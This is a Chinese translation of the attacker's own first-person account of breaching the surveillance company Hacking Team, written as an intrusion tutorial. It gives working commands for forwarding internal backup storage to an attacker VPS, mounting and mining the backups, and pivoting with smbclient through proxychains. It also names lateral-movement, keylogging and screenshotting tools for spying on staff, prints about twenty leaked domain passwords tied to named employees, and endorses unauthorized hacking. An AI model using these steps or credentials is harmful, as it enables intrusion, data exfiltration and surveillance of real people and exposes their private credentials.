Hacking Team 是一個協助政府hack和監視記者、政治家等的公司(詳見段尾鏈接),當然有時候也會監控恐怖分子和罪犯。其CEO——Vincenzetti——很喜歡在他的郵件末尾加上一句納粹標語“boia chi molla” (放棄者該死),同時,他一直宣稱擁有可以解決“Tor 問題”和“暗網問題”的技術。但是我一直很懷疑他的那種技術的有效性。
很不幸,我們的世界是顛倒的,你越做壞事越富有,越做好事反而被抓。但幸運的是,多虧了人們的努力,比如"Tor項目",你可以通過以下指導來防止被人抓住把柄:
1) 加密的你的硬盤
如果有一天你做的事被發現了,警察叔叔帶走了你的電腦,盡管被發現就意味著你已經犯了很多錯誤,但是加密硬盤會比不加密要好得多。
2) 使用虛擬機并且把所有的網絡都走Tor
這樣就實現了兩點,第一、你的所有流量都匿名了。第二、把你的個人生活和匿名操作分開了,防止兩種生活互相混合。
3) 不要直接連接Tor網絡 (可選項)
Tor不是萬能藥,有可能你在連接到Tor網絡的時候剛好在做壞事。也可能你在退出Tor網絡的時候你同樣在做壞事。最好還是用別人的wifi,或者連接vpn或者中轉機子,然后連接Tor匿名網絡。
盡管這個過程非常無聊,但卻是非常重要,目標越大越多,漏洞出現的幾率就越大。
主要使用以下各種方面的信息
1)Google
如果使用合適的語句,你可以發現大量的意外收獲。
2)二級域名搜集
一般來說,域名大部分都是又第三方公司提供的,你需要尋找到其域名的IP范圍。當然,有時候會存在DNS域傳送漏洞,這樣就更好搜集信息了。
3)Whois查詢和反向查詢
通過各種Whois查詢和其ip范圍的域名反向查詢,你也可以獲得很多其他子域名,據我所知,沒有免費的反向查詢,除非谷歌hack。
4)端口掃描和指紋提取
和其他的技術不同,你可以跟公司的員工聊天。我把它作為可選項放在這里因為它不是一種攻擊方式,只是搜集信息的一種方式。在掃描的過程中,該業務的入侵檢測系統可能會告警,但是不用擔心,整個Inernet都經常會掃描自身。
對于掃描來說,Nmap是再合適不過了,它也可以識別各種服務的指紋。但是對于大規模網絡來說,zmap和masscan更快速。WhatWeb和BlindElephant 適合抓取web指紋。
對于社會工程學來說,搜集員工信息非常重要,包括他們的各自的角色,合約,使用的操作系統,瀏覽器,插件,軟件等。一般使用如下途徑:
1)Google
這也是最有用的工具。
2)theHarvester y recon-ng
我在上一個內容中就提到了這些東西,但是他們其實還有更多的用處。你可以自動快速地找到大量的信息,這也值得你去花時間閱讀官方文檔。
3)LinkedIn
你可以通過這個軟件獲取到大量的雇員信息,內部人員總是傾向于與他人交流。
4)Data.com
它就像拼圖一樣把各種信息整合在一起。
5)File metadata
你可以在他們公司發布的各種文檔中找到大量有用的信息。
進入內網的方式有很多種。我打入HT內網的方式是不常見的,而且比平時花的精力要多得多,所以我在這里提一下進入內網的兩種常見的方式,這兩種也是我推薦的。
社會工程學,尤其是魚叉式網絡釣魚,是各種滲透技巧中比較可靠的一種。更多技巧請移步段尾鏈接。我不想嘗試對HT進行釣魚攻擊,因為這種攻擊方式對他們來說太常見了,所以他們會非常警惕。既增加了難度,又容易被發現我的意圖。 http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
多虧了勤勞的俄羅斯人和他們的滲透工具 “traffic sellers”和“bot herders”,許多公司都已經有了被入侵的電腦。幾乎所有世界五百強的大型網絡中都存在一些被入侵的機器。但是Hacking Team是個小公司,他們的大多數員工都是信息安全專家,所以他們內部存在被入侵機器的可能性非常小。
Gamma公司被黑以后,我就已經描述了一個尋找漏洞的過程:
http://pastebin.com/raw.php?i=cRYvK4jb
Hacking Team有一個段的公網IP:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet
他們的網絡有少量暴露在外網,比如不像Gamma公司,他們的公網地址都需要證書才能連接。HT的公網服務器主要有一個Joomla的博客(joomscan沒有掃出來有用的東西),一個郵件服務器,幾個路由,兩個VPN,一個垃圾郵箱過濾系統。所以我現在只能通過以下方式獲取權限:發現一個Joomla的0day,或者postfix的0day,或者他們其他一個系統的0day。嵌入式系統的0day對于我來說比較靠譜點,于是我花了兩周的時間,通過逆向發現了一個命令執行0day。這個0day至今仍然沒有修復,所以我也不方便給出更多細節。
在正式攻擊之前,我做了很多測試和準備,在硬件里面寫入了一個后門,并且在嵌入式系統上編譯了各種各樣的工具:
1) busybox
這個工具大多數的Unix系機器都沒有。
2)nmap
掃描工具
3)Responder.py
內網中間人攻擊神器
4)python
這個必須得有
5)tcpdump
抓包
6)dsniff
在內網中嗅探各種密碼之類的,我更喜歡用HT的ettercap,但是編譯起來很麻煩。
7)socat
NC的升級版,主要端口轉發
8)screen
可以讓你多窗口執行命令,其實也不是太需要
9)socks5代理主機
加上proxychains,插入內網
10)tgcd
通過轉發端口,穿透防火墻
最坑的事兒就是你把后門和工具部署上去之后,系統掛了,然后運維上去一看,全完了。所以我花了一周的時間在最后的部署之前測試我的各種后門和exp。
現在我已經進入內網了,我想看到處看一下,并決定我下一步的工作。把Responder.py切換到分析模式(-A),然后用Nmap慢慢的掃著先。
NoSQL,這種無需認證的數據庫對我來說簡直就是天賜良機。當我還在擔心無法通過MySQL繼續下去的時候,這些缺乏認證的數據庫出現了。Nmap發現了HT內網的一些數據庫:
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
...
|_ version = 2.6.5
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
...
|_ version = 2.6.5
這些是做RCS測試的實例。RCS抓到的音頻都存儲在MongoDB里面。400G種子里面的音頻就是來自這里,他們也在監視著自己。
比較有趣的是,看著監視器中正在開發惡意軟件的HT,盡管這對我的滲透來說并沒有什么用。他們不安全的備份系統是下一個敞開的大門。根據他們自己的文檔,他們的iSCSI系統應該在一個分離的網段,但是卻在192.168.1.200/24網段被nmap掃描出來了:
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required
iSCS需要一個核心模塊,這個核心模塊在我的嵌入式系統中很難編譯。所以我準備把端口轉發出來以便于能夠在VPS上掛載。
VPS: tgcd -L -p 3260 -q 42838
Sistema embebida: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
iSCSI發現了iqn.2000-01.com.synology,但是在掛載的時候出現了一些問題,它的地址同時是192.168.200.72和127.0.0.1。
解決辦法是:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
然后:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
至此,文件系統現身了!掛載上去:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
然后就可以發現若干個虛擬機的安全備份了,郵件服務器看起來很有吸引力。盡管他太大了,還是可以遠程掛載上來,搜索我們想要的東西:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
entonces el offset es 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/
現在,在/mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 我們可以發現虛擬機的硬盤,然后 就可以掛載上去了:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
最后,我們就可以在/mnt/part1看到所有老的郵件交換服務器上的東西了。
.其實我最感興趣的還是想在安全備份文件里面找到一些常用的密碼或者hash以便于進入物理機。我使用pwdump, cachedump 和lsadump去尋找可能的密碼,最后lsdadump發現了一個bes管理服務器的賬戶的密碼:
_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
我通過proxychains加上嵌入式機器上的socks代理,和smb客戶端去嘗試這個密碼:
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
成功了!密碼仍然有效,而且是本地管理員。我用代理和metasploit的psexec__psh 來獲取一個meterpreter session。我在機器上抓取到了他的其他密碼,包括域管理員的密碼。
HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- look! the sysadmin!
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe [email protected]!
現在我有了域管理員密碼,就可以進入到業務核心——郵件中了。之后做的每一步操作都有可能隨身被發現,以防萬一,先下載郵件,這里powershell起了很大的作用。我發現了處理日期的一個bug。在得到郵件后,我又花了兩周時間去獲得源碼和其他東西,之后又把新的郵件下載了下來。服務器是意大利的,時間的格式是:日/月/年,我用:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
這個語法去搜索郵件服務器并且下載新的郵件,問題是獲得了”日期錯誤:day不能大于12“的結果,因為歐洲時間中月份通常在第一位,月份不能大于12,。看來微軟的工程師們只在他們自己的時區測試了他們的軟件。
現在我已經是域管理了,我開始通過smb客戶端和代理去下載各種資源:
proxychains smbclient '//192.168.1.230/FAE DiskStation' \ -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
至此,所有的東西都被下載下來了。
在與HT的故事結束之前,我想對windows內網滲透做一些簡介。
在這里,我跟大家對各種內網滲透的技術做一些回顧。遠程執行的方式是需要密碼或者本地管理員的hash的。目前為止,最常見的方法是在機器上以管理員權限用mimikatz本地抓取管理員密碼。而比較好的提升權限工具主要是PowerUp和bypassuac。 遠程移動:
1)psexec
windows上這方面很有效的工具。你可以使用psexec,winexe,metasploit的psexec_psh,powershell 的invoke_psexec或者windows內建函數"sc"。對于metasploit的模塊和powershell、pth-winexe,你只需要hash即可,無需密碼。這是最通用的方法,但是也是最不隱蔽的方法。時間類型7045“service control manage”會顯示在時間日志中。根據我的經驗,沒有人會在滲透的時候注意到這個細節,但是這個細節卻對事件調查者有一定的幫助。
2)WMI
這是最隱蔽的方法。WMI服務在除了服務器的所有windows機器上都是開著的,服務器上的防火墻默認不會允許該服務通過。你可以使用wmiexec.py,pth-wmis,powershell 的 invoke_wmi,或者windows上的內建wmic函數。所有的wmic只需要hash。
3)PSRemoting
該功能默認是關閉的,我也不推薦將其開啟。但是如果系統管理員已經將其開啟了,就非常方便了,特別是如果你用ps干所有的事都很容易,而且不會留下太多足跡。
4)GPO
如果以上所有的方法都被防火墻過濾了,而且你又是域管理,你就可以通過GPO給用戶一個登錄腳本,安裝一個msi,執行一個定時任務或者就像我們看到的 Mauro Romeo 那樣利用GPO開啟了WMI服務并且關閉了該服務的防火墻過濾。
本地移動:
1) 盜取token
如果你在一臺電腦上有管理權限,你就可以用其他用戶的token去獲取域資源。這方面主要有兩個工具:incognito 和mimikatz token::*命令行。
2)MS14-068
你可以利用Kerberos 的一個bug去獲取域管理tickets。
3)進程注入
任何一款遠控都有進程注入的功能。比如meterpreter、pupy中的migrate命令,或者pwershell中的psinject命令。你可以注入到有你需要的token的進程中。
4)runas
這是一款非常有用的工具,因為它不需要管理員權限。他使用的windows命令,如果你沒有gui你可以使用powershell。
一旦你擁有了權限,首先想到的就是保持權限。權限保持一般只是對于HT這樣目標是個人和政治活動者的混蛋來說是個挑戰(看來作者跟HT有仇)。對于滲透一個公司來說,權限保持一般不重要,因為公司一般不會關掉機器。你可以從下面的鏈接獲取更多關于權限維持的技巧。對于滲透一個公司來說,這是不必要的,反而會增加被發現的幾率。 http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ http://www.hexacorn.com/blog/category/autostart-persistence/ https://blog.netspi.com/tag/persistence/
之前最好的探測windows網絡的工具是powerview。這款工具很值得你去閱讀以下鏈接:
http://www.harmj0y.net/blog/tag/powerview/ http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ http://www.harmj0y.net/blog/redteaming/powerview-2-0/ http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ http://www.slideshare.net/harmj0y/i-have-the-powerview
當然,powershell也是很有效的工具,不過在2003和2000的機子上可沒有powershell。你也可以像以前那樣,用用"net view"這種命令,其他我喜歡的技巧主要有:
1)下載文件列表
通過一個域管理賬戶你可以用powerview下載網絡中的所有文件的列表:
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
然后你就可以隨心所欲選擇你想要的文件來下載。
2)閱讀郵件
我們已經知道,你可以用powershell下載郵件,而且它還有很多有用的信息。
3)查看門戶站點
這是許多業務存儲重要信息的地方。這個也可以用powershell下載下來。
5)監視員工
我的興趣之一就是尋找系統管理員。監視Christian Pozzi(HT的一個管理員)給了我Nagios 服務器的權限以及“Rete Sviluppo”的權限。利用PowerSploit 中的Get-Keystrokes 和 Get-TimedScreenshot、GPO等的組合,你可以監視任何一個員工,甚至是整個域。
通過對他們內部的文檔的閱讀,我發現我缺少一個很重要的權限——“Rete Sviluppo”——一個存放RCS源碼的孤立網絡。系統管理員總是有所有的權限,所以我就搜索Mauro Romeo 和Christian Pozzi的電腦,看他們怎么管理Sviluppo網絡,順便看看有沒有其他我感興趣的系統。他們的電腦也是域成員,所以搞到他們的電腦權限很簡單。Mauro Romeo的電腦沒有開放任何端口,所以我打開了WMI的端口并執行了meterpreter。為了監控他們的鍵盤和屏幕,我使用很多metersploit的/gathre/模塊。然后到處搜索感興趣的文件。我發現Pozzi有個加密卷,便等他把它掛載上來的時候,復制了所有的文件。他們的密碼對我來說,都是沒有任何用處的,我感到很可笑。因為mimikatz和鍵盤記錄器泄露了一切。
Pozzi的加密卷中,有很多文本格式的密碼。其中一些就是Nagios服務器的密碼,為了方便監視,這個服務器有權限訪問那個Sviluppo網絡。我也就找到了一座進入孤立網絡的橋梁。盡管我有那個服務器的密碼,但是他還有個公開的命令執行。
閱讀郵件后,我看到了Daniele Milan有git機器的權限。我已經有了他的windows密碼(mimikatz),我在git機器上嘗試了一下,成功了!而且可以sudo。為了拿到gitlab服務器和他們的推特賬號,我利用了郵件服務器和“忘記密碼”功能重置了密碼。
以上就是我對抗一個公司并且終止了他們侵犯人權的行為的過程。 這也是Hacking的魅力與不對稱:一個人花100個小時,便可以對抗并逆轉一個有著好幾年歷史價值數百萬美元公司的命運。Hacking能夠給予失敗者戰斗并贏回的機會。
Hacking參考通常意味著放棄:這只是一個小小的教訓,做一個有道德的黑客,不要未經允許攻擊他人的系統等等。我經常這樣說,但是做起來卻經常與之背道而馳。泄露文件,沒收銀行的錢財,努力讓普通人的電腦變得更加安全,這才是有道德的黑客。但是,很多人稱自己為“良心黑客”,其實他們只是為給他們更多錢的人工作,而那些人更應該被hack。
HT視他們自己為意大利創新的一部分,但是在我看來,Vincenzetti和他的公司,他在警察中的密友,政府都是意大利法西斯主義的傳統。謹以此文獻給在迪亞茲阿曼多學校的突襲中的受害者們,和所有因意大利法西斯主義而受到過傷害的人們。
原作:https://ghostbin.com/paste/6kho7?luicode=10000359,由安全工具箱翻譯。